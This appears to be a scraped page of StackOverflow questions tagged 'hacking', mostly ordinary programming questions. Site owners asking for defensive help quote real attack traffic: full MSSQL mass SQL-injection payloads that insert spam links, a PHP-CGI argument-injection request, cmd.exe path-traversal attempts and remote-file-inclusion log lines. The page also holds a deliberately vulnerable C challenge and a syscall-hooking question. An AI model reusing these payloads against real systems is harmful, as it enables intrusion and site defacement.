EzDevInfo.com

hacking interview questions

Top hacking frequently asked interview questions

Kali linux - "bash:aircrack:command not found" and how to make it work

I am using Kali 2.0 on my USB Live donge and I can see aircrack is installed in the program menu. But when typed something like aircrack -ng or airmon -ng start wlan0 it retrieves bash:command not found. Does somebody know whats wrong with that? Thanks a lot.


Source: (StackOverflow)

Why using char* arr[1] in C?

I came across the following code. Why *child[1] is used instead of *child?

struct _zend_ast {
    zend_ast_kind kind; /* Type of the node (ZEND_AST_* enum constant) */
    zend_ast_attr attr; /* Additional attribute, use depending on node type */
    uint32_t lineno;    /* Line number */
    zend_ast *child[1]; /* Array of children (using struct hack) */
};

Source: (StackOverflow)

Advertisements

Any way to workaround WPF's calling of GC.Collect(2) aside from reflection?

I recently had to check in this monstrosity into production code to manipulate private fields in a WPF class: (tl;dr how do I avoid having to do this?)

private static class MemoryPressurePatcher
{
    private static Timer gcResetTimer;
    private static Stopwatch collectionTimer;
    private static Stopwatch allocationTimer;
    private static object lockObject;

    public static void Patch()
    {
        Type memoryPressureType = typeof(Duration).Assembly.GetType("MS.Internal.MemoryPressure");
        if (memoryPressureType != null)
        {
            collectionTimer = memoryPressureType.GetField("_collectionTimer", BindingFlags.Static | BindingFlags.NonPublic)?.GetValue(null) as Stopwatch;
            allocationTimer = memoryPressureType.GetField("_allocationTimer", BindingFlags.Static | BindingFlags.NonPublic)?.GetValue(null) as Stopwatch;
            lockObject = memoryPressureType.GetField("lockObj", BindingFlags.Static | BindingFlags.NonPublic)?.GetValue(null);

            if (collectionTimer != null && allocationTimer != null && lockObject != null)
            {
                gcResetTimer = new Timer(ResetTimer);
                gcResetTimer.Change(TimeSpan.Zero, TimeSpan.FromMilliseconds(500));
            }
        }                
    }       

    private static void ResetTimer(object o)
    {
        lock (lockObject)
        {
            collectionTimer.Reset();
            allocationTimer.Reset();
        }
    }
}

To understand why I would do something so crazy, you need to look at MS.Internal.MemoryPressure.ProcessAdd():

/// <summary>
/// Check the timers and decide if enough time has elapsed to
/// force a collection
/// </summary>
private static void ProcessAdd()
{
    bool shouldCollect = false;

    if (_totalMemory >= INITIAL_THRESHOLD)
    {
        // need to synchronize access to the timers, both for the integrity
        // of the elapsed time and to ensure they are reset and started
        // properly
        lock (lockObj)
        {
            // if it's been long enough since the last allocation
            // or too long since the last forced collection, collect
            if (_allocationTimer.ElapsedMilliseconds >= INTER_ALLOCATION_THRESHOLD
                || (_collectionTimer.ElapsedMilliseconds > MAX_TIME_BETWEEN_COLLECTIONS))
            {
                _collectionTimer.Reset();
                _collectionTimer.Start();

                shouldCollect = true;
            }
            _allocationTimer.Reset();
            _allocationTimer.Start();
        }

        // now that we're out of the lock do the collection
        if (shouldCollect)
        {
            Collect();
        }
    }

    return;
}

The important bit is near the end, where it calls the method Collect():

private static void Collect()
{
    // for now only force Gen 2 GCs to ensure we clean up memory
    // These will be forced infrequently and the memory we're tracking
    // is very long lived so it's ok
    GC.Collect(2);
}

Yes, that's WPF actually forcing a gen 2 garbage collection, which forces a full blocking GC. A naturally occurring GC happens without blocking on the gen 2 heap. What this means in practice is that whenever this method is called, our entire app locks up. The more memory your app is using, and the more fragmented your gen 2 heap is, the longer it will take. Our app presently caches quite a bit of data and can easily take up a gig of memory and the forced GC can lock up our app on a slow device for several seconds -- every 850 MS.

For despite the author's protestations to the contrary, it is easy to arrive at a scenario where this method is called with great frequency. This memory code of WPF's occurs when loading a BitmapSource from a file. We virtualize a listview with thousands of items where each item is represented by a thumbnail stored on disk. As we scroll down, we are dynamically loading in those thumbnails, and that GC is happening at maximum frequency. So scrolling becomes unbelievably slow and choppy with the app locking up constantly.

With that horrific reflection hack I mentioned up top, we force the timers to never be met, and thus WPF never forces the GC. Furthermore, there appear to be no adverse consequences -- memory grows as one scrolls and eventually a GC is triggered naturally without locking up the main thread.

Is there any other option to prevent those calls to GC.Collect(2) that is not so flagrantly hideous as my solution? Would love to get an explanation for what the concrete problems are that might arise from following through with this hack. By that I mean problems with avoiding the call to GC.Collect(2). (seems to me the GC occurring naturally ought to be sufficient)


Source: (StackOverflow)

Someone is trying to hack my website

I am catching the following exception in my logs:

mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in 
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case 
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''inderal 10mg ''+char(60)+''a rel='nofollow' href=&quot;http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else 
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in 
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--&lt;br/&gt;    sess: 2&lt

The hacking begins at the moment of ;declare and finishes at the --. All of my Sql Queries should be paramaterized but if not, I need to eliminate this threat.

What are my best options here? I have a specific "web" login account for the database. What is best practice for minimizing this web login account credentials or denying specific sql objects?

What is this person trying to do? Here's another hack attempt:

;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into 
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''tadalafil 40mg ''+char(60)+''a 
rel='nofollow' href=&quot;http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir 
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin 
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--&lt;br

And here's a snapshot of my log. If you look from bottom to top you can see that this hacker is trying each parameter to inject his code.

enter image description here


Source: (StackOverflow)

CSS hack only for apple iphone

I want to change some CSS property only in the apple iphone devices. Is there any way to find the apply iphone alone.

For all deives

.menu{
    -webkit-transition:all 100ms ease;
    -moz-transition:all 100ms ease;
    -o-transition:all 100ms ease;
    transition:  all 100ms ease;
}

Only for Apple Iphone

   .menu{
    transition: none;
    }

Source: (StackOverflow)

What is FreeBSD MD5 and why does it produce hashes in non-hexadecimal notation?

I am doing a hacking challenge from Hack This Site in which I found a password hash and then cracked it by brute forcing possibilities. The format that my hash cracker (John the Ripper) used was something called "FreeBSD MD5". The password and hash are the following: PW: shadow HASH: $1$AAODv...$gXPqGkIO3Cu6dnclE/sok1

My question is, doesn't MD5 normally only have the charset 0123456789abcdef (hexadecimal)? Why is this hash suddenly including a bunch of other characters?

Screenshot: enter image description here


Source: (StackOverflow)

hack attempts from IP 127.0.0.1 - is there an exploit to be aware of?

I have noticed numerous entries in Tomcat's local_access_log for various resources coming from IP address 127.0.0.1. These are clearly attempts to hack in. For example, here is a request to get access to the "manager" app:

127.0.0.1 - - [30/Apr/2015:13:35:13 +0000] "GET /manager/html HTTP/1.1" 401 2474

here is another one:

127.0.0.1 - - [30/Apr/2015:21:23:37 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 1016

When decoded, the URL is this:

127.0.0.1 - - [30/Apr/2015:21:23:37  0000] "POST /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env="yes" -d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n HTTP/1.1" 404 1016

There are lots of such entries, all from IP address 127.0.0.1. Obviously, since this is the address of localhost, I can't block it. More over, I am not sure if there is something that I can do about it. Is there possibly an exploit that should be patched up? For instance, is there a version of Tomcat that has a related vulnerability? I am running Tomcat 8.

Much thanks for any advice!

UPDATE: thanks for the suggestion about a proxy. Turned out that httpd was indeed installed and not surprisingly, there are suspicious request. For example:

[Sat Mar 30 17:26:49 2013] [error] [client 5.34.247.59] Invalid URI in request GET /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[Sat Mar 30 17:26:49 2013] [error] [client 5.34.247.59] Invalid URI in request GET /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0
[Sat Mar 30 17:26:49 2013] [error] [client 5.34.247.59] Invalid URI in request GET /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0 

This is not a windows system so cmd.exe has not place for it...


Source: (StackOverflow)

New in Socket.io, How to prevent Socket.io client script hacking

I'm new in Socket.IO, and I've just implemented the tutorial instruction about Socket.IO at http://socket.io/get-started/chat/. It's quite interesting.

But now I have a concern about security. The client code for sending message is:

<script>
  var socket = io();
  $('form').submit(function(){
    socket.emit('chat message', $('#m').val());
    $('#m').val('');
    return false;
  });
  socket.on('chat message', function(msg){
    $('#messages').append($('<li>').text(msg));
  });
</script>

The function call socket.emit will send a message to Server, by this flow, anyone who access the web can easily modify Javascript code (use Chrome devtools, or Firebug) to send any message to Server.

For example, user can add the code lines as following:

<script>
   $(document).load(function() {
       socket.emit('chat message', '1122');
       socket.emit('get_users', null);
       socket.emit('delete_user', 1);        // What ever he wants
   });
</script>

This hack may cause harmful to system.

My question is, how to prevent user from modifying Javascript code and making a manual call to socket.io server, including users who have right to log in web application.

Any help would be great appreciated!


Source: (StackOverflow)

Hook ALL system calls in Linux

The goal is to add a hook to all system calls in Linux, that is, the hook function should get called before any of those 300 Linux system calls are invoked.

There are sys_call_table hacks (e.g. [here]), which however only allow to hook one or few system calls; that is, if read() needs to be hijacked, the sys_read entry in sys_call_table is modified to the new function that has a hook handler.

Of course, you can manually hook all 300 syscall entries; but I am looking for a more elegant approach with few code modification.

A possible approach is to change the file entry_64.S where ENTRY(system_call) reside. However, as I need to use linux kernel module and hack a live system, I find it difficult to modify the memory image of entry_64.S in a running Linux system.

So my question is:

  1. if the entry_64.S design makes sense, how to modify a live memory area where kernel code resides (kernel code segment)?
  2. if it does not make sense, in general, how to modify one (or few) place in Linux src code and allows all sys calls being hooked.

PS: platform: Linux 3.16 and x86_64

PS2: Again my question is DIFFERENT from those sys_call_table hacks in prior stack overflow questions. See paragraph 2 for details.


Source: (StackOverflow)

Suspicious url - is someone trying to hack me?

In my Apache error log I found the following line:

[Fri Jul 17 22:15:48.632018 2015] [:error] [pid 2784:tid 1048] [client 97.74.24.134:57050] PHP Warning:  htmlspecialchars() expects parameter 1 to be string, array given in C:\\Apache24\\htdocs\\catalog\\private\\class\\ResolvedQuery.class.php on line 361

This line repeated itself a few times.

In my access log, I found the following requests:

97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp;sa=U&amp;ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp;usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 448
97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp%3bsa=U&amp%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp;sa=U&amp;ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp;usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 472
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp%3bsa=U&amp%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:56 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 38779
97.74.24.134 - - [17/Jul/2015:22:15:59 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189  
97.74.24.134 - - [17/Jul/2015:22:16:00 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:03 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 320
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:07 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 344
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET / HTTP/1.1" 200 12875

I use a .htaccess file to direct all requestes into an index.php file. From then on, I handle the request like this:

$query = str_replace('_url=/', '', $_SERVER['QUERY_STRING']);

From then on I do some operations on $query.

The part of the code that triggers the error however is the following:

//sanitize requests array.
    if (!empty($_REQUEST)){
        foreach($_REQUEST as $req => $value){
            $p = htmlspecialchars($req);
            $v = htmlspecialchars($value); // THIS LINE TRIGGERS THE ERROR!
            $this->requests[$p] = $v;
        }
    } 

Now, what kind of attack is this? Does the code presented here protect me from this attack? And if not, what do I have to do to protect against this attack?

I'm using Apache 2.4, php 5.6 on Win7


Source: (StackOverflow)

How to get a raw memory pointer to a managed class?

How do I find a raw pointer to a managed class in C#, and, hopefully, it's raw size in memory? Obviously, this is not allowed by CLR - more precisely, strictly prohibited, as unmanaged representation of managed classes should never, ever be worked with for both stability and safe reasons - so I'm looking for a hack. I'm not looking for serializing - I do actually need a dump of managed class as it is represented in raw memory.

More precisely, I'm looking for something like function getObjectPtr in the following example:

IntPtr getObjectPtr(Object managedClass) {...}

void main() {
    var test=new TestClass();
    IntPtr* ptr_to_test=getObjectPtr(test);
    Console.WriteLine(ptr_to_test.ToString());
}

Thanks in advance!

EDIT: I've finally found a solution by myself, and, when came back to post it as an answer, was totally surprised by the amount of so-quickly already posted answers... Thanks to all of you! This was very quick and totally unexpected.

The closest to mine solution was @thehennyy's one, but I'm not posting it since @Chino proposed far better one (sorry I've mistaken it to be wrong at first, I've just forgot to dereference the pointer again). It does not require a code to be unsafe and a bit more tolerates GC:

class Program
{
    // Here is the function in case anyone needs it.
    // Note, though, it does not preserve the handle while you work with
    // pointer, so it is less reliable than the code in Main():
    static IntPtr getPointerToObject(Object unmanagedObject)
    {
        GCHandle gcHandle = GCHandle.Alloc(unmanagedObject, GCHandleType.WeakTrackResurrection);
        IntPtr thePointer = Marshal.ReadIntPtr(GCHandle.ToIntPtr(gcHandle));
        gcHandle.Free();
        return thePointer;
    }
    class TestClass
    {
        uint a = 0xDEADBEEF;
    }
    static void Main(string[] args)
    {
        byte[] cls = new byte[16];

        var test = new TestClass();

        GCHandle gcHandle = GCHandle.Alloc(test, GCHandleType.WeakTrackResurrection);
        IntPtr thePointer = Marshal.ReadIntPtr(GCHandle.ToIntPtr(gcHandle));
        Marshal.Copy(thePointer, cls, 0, 16); //Dump first 16 bytes...
        Console.WriteLine(BitConverter.ToString(BitConverter.GetBytes(thePointer.ToInt32())));
        Console.WriteLine(BitConverter.ToString(cls));

        Console.ReadLine();

        gcHandle.Free();
    }
}
/* Example output (yours should be different):
40-23-CA-02
4C-38-04-01-EF-BE-AD-DE-00-00-00-80-B4-21-50-73

That field's value is "EF-BE-AD-DE", 0xDEADBEEF as it is stored in memory. Yay, we found it!
*/

Hovewer, now I'm a bit clueless. According to the this article, first 2 addresses in the class should be pointers to SyncBlock and RTTI structure, and therefore the first field's address must be offset by 2 words [8 bytes in 32-bit systems, 16 bytes in 64-bit systems] from the beginning. Mine is 64-bit; however, as you can see in the output, it is obvious that first field's raw offset from the object's address is only 4 bytes, which doesn't make any sense.

I've asked this as a separate question. Maybe I should ask this as a separate question, but it is possible that there is an error in my solution.


Source: (StackOverflow)

Using security questions and its safety

I know Security Questions are not safe and easily guessed but what if after answering the security question we just send the securely prepared link to recover/reset the password to their email? Will that be again a problem?

And I also use PDO in my codes so no worries on SQL injection.


Source: (StackOverflow)

Hacking Challenge - locating vulnerability in the code

My Friend recently completed a hacking challenge and sent it to me (binary and source). I wanted to ask here before I asked him for tips as I want to do it myself :)

I've been going through it but I am struggling to find the vulnerability.

#include <alloca.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

static void usage(const char *argv0) {
    printf("Build your own string!\n");
    printf("\n");
    printf("Usage:\n");
    printf("  %s length command...\n", argv0);
    printf("\n");
    printf("Each command consist of a single character followed by it's index.\n");
    printf("\n");
    printf("Example:\n");
    printf("  %s 11 h0 e1 l2 l3 o4 w6 o7 r8 l9 d10\n", argv0);
    exit(1);
}

int main(int argc, char **argv) {
    char *buffer;
    unsigned short buffersize, i, index, length;

    if (argc < 2) usage(argv[0]);

    length = atoi(argv[1]);
    if (length <= 0) {
            fprintf(stderr, "bad length\n");
            return 1;
    }

    buffersize = length + 1;
    buffer = alloca(buffersize);
    memset(buffer, ' ', buffersize);
    buffer[buffersize - 1] = 0;

    for (i = 2; i < argc; i++) {
            if (strlen(argv[i]) < 2) {
                    fprintf(stderr, "bad command \"%s\"\n", argv[i]);
                    return 1;
            }

            index = atoi(argv[i] + 1);
            if (index >= length) {
                    fprintf(stderr, "bad index in command \"%s\"\n", argv[i]);
                    return 1;
            }

            buffer[index] = argv[i][0];
    }

    printf("%s\n", buffer);
    return 0;
}

I think the vulnerability lies within the short int, and the use of alloca.

Entering ./app 65535 65535 can cause a segfault but I can't actually override anything since buffer will only ever be set to max 65535 or it loops around. This makes me think I can't override the EIP to inject shellcode.

Can anyone help me with where to look at?

Thanks!


Source: (StackOverflow)

Python Password Program [closed]

I'm a beginner programmer and thought it would be cool to create a program to loop through "all" possible passwords. On a scale of 1-10, how efficient would you rate the following "hacking program?" Is there any way to make the following code more efficient? Any algorithms or tricks that you may know of?

I've considered moving 'e' and more common letters to the beginning of my character array since those letters are used more commonly.

import sys

password = raw_input("Enter a password: ")

characters = []
lower = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
upper = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
number = ["1","2","3","4","5","6","7","8","9","0"]
symbol = ["!","@","#","$","%","^","&","*","(",")","_","+","-","="]

#Creates array with most keyboard characters
for i in range(len(lower)):
    characters.append(lower[i])
for i in range(len(upper)):
    characters.append(upper[i])
for i in range(len(number)):
    characters.append(number[i])
for i in range(len(symbol)):
    characters.append(symbol[i])

found = False

#For 1 character passwords
for a in range(len(characters)):
    if (characters[a] == password):
        print (characters[a])
        found = True
if (found):
    sys.exit()

#For 2 character passwords
for a in range(len(characters)):
    for b in range(len(characters)):
        if (characters[a] + characters[b] == password):
            print (characters[a] + characters[b])
            found = True
if (found):
    sys.exit()

for a in range(len(characters)):
    for b in range(len(characters)):
        for c in range(len(characters)):
            if (characters[a] + characters[b] + characters[c] == password):
                print (characters[a] + characters[b] + characters[c])
                found = True
if (found):
    sys.exit()

for a in range(len(characters)):
    for b in range(len(characters)):
        for c in range(len(characters)):
            for d in range(len(characters)):
                if (characters[a] + characters[b] + characters[c] + characters[d] == password):
                    print (characters[a] + characters[b] + characters[c] + characters[d])
                    found = True
if (found):
    sys.exit()

for a in range(len(characters)):
    for b in range(len(characters)):
        for c in range(len(characters)):
            for d in range(len(characters)):
                for e in range(len(characters)):
                    if (characters[a] + characters[b] + characters[c] + characters[d] + characters[e] == password):
                        print (characters[a] + characters[b] + characters[c] + characters[d] + characters[e])
                        found = True
if (found):
    sys.exit()

Source: (StackOverflow)

Can you tell me what is wrong with this and how to fix it?

I have this code and I have been trying to make it work for hours

DWORD GetModuleNamePointer(LPSTR LPSTRModuleName, DWORD __DwordProcessId)
{ 
    MODULEENTRY32 lpModuleEntry = {0};
    HANDLE hSnapShot = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, __DwordProcessId);
    if(!hSnapShot)
        return NULL;  
    lpModuleEntry.dwSize = sizeof(lpModuleEntry);
    BOOL __RunModule = Module32First( hSnapShot, &lpModuleEntry );
    while(__RunModule)
    {
        if(!strcmp(lpModuleEntry.szModule, LPSTRModuleName ) )
        {
            CloseHandle( hSnapShot );
            return (DWORD)lpModuleEntry.modBaseAddr;
        }
        __RunModule = Module32Next( hSnapShot, &lpModuleEntry );
    }
    CloseHandle( hSnapShot );
    return NULL;
}

I get an error when I try to compile it from this line.

return (DWORD)lpModuleEntry.modBaseAddr;

And this is the error.

[Error] invalid conversion from 'BYTE* {aka unsigned char*}' to 'DWORD {aka long unsigned int}' [-fpermissive]

What do I do to fix this? I honestly have no clue.


Source: (StackOverflow)